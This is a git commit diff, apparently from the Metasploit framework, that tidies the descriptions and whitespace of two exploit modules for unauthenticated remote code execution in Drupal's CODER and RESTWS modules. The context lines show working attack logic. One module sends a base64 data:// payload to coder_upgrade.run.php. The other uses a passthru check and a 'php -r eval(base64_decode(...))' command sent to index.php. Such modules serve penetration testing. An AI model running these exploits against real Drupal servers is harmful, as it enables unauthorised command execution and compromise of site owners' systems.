Clean up Mehmet modules
This commit is contained in:
parent
b4846e5793
commit
62d28f10cb
|
@ -12,16 +12,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Drupal CODER Module Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a Remote Command Execution vulnerability in
|
||||
Drupal CODER Module. Unauthenticated users can execute arbitrary command
|
||||
under the context of the web server user.
|
||||
This module exploits a Remote Command Execution vulnerability in the
|
||||
Drupal CODER Module. Unauthenticated users can execute arbitrary
|
||||
commands under the context of the web server user.
|
||||
|
||||
CODER module doesn't sufficiently validate user inputs in a script file
|
||||
that has the php extension. A malicious unauthenticated user can make
|
||||
requests directly to this file to execute arbitrary command.
|
||||
The module does not need to be enabled for this to be exploited
|
||||
The CODER module doesn't sufficiently validate user inputs in a script
|
||||
file that has the PHP extension. A malicious unauthenticated user can
|
||||
make requests directly to this file to execute arbitrary commands.
|
||||
The module does not need to be enabled for this to be exploited.
|
||||
|
||||
This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
|
||||
This module was tested against CODER 2.5 with Drupal 7.5 installed on
|
||||
Ubuntu Server.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -64,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
|
||||
)
|
||||
|
||||
if res && res.body.include?('file parameter is not setNo path to parameter file')
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
|
@ -84,7 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
p << ':"-v;'
|
||||
p << payload.encoded
|
||||
p << ' #";s:4:"name";s:4:"test";}}}'
|
||||
|
||||
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
|
||||
|
|
|
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a Remote PHP Code Execution vulnerability in
|
||||
This module exploits a Remote PHP Code Execution vulnerability in the
|
||||
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
|
||||
under the context of the web server user.
|
||||
|
||||
|
@ -20,9 +20,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
additional functionality. A vulnerability in this approach allows
|
||||
an unauthenticated attacker to send specially crafted requests resulting
|
||||
in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
|
||||
versions are affected by issue.
|
||||
are affected by this issue.
|
||||
|
||||
This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
|
||||
This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
|
||||
Ubuntu Server.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -55,6 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
r = rand_text_alpha(8 + rand(4))
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -62,6 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'q' => "taxonomy_vocabulary//passthru/echo #{r}"
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?(r)
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
|
@ -71,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
|
Loading…
Reference in New Issue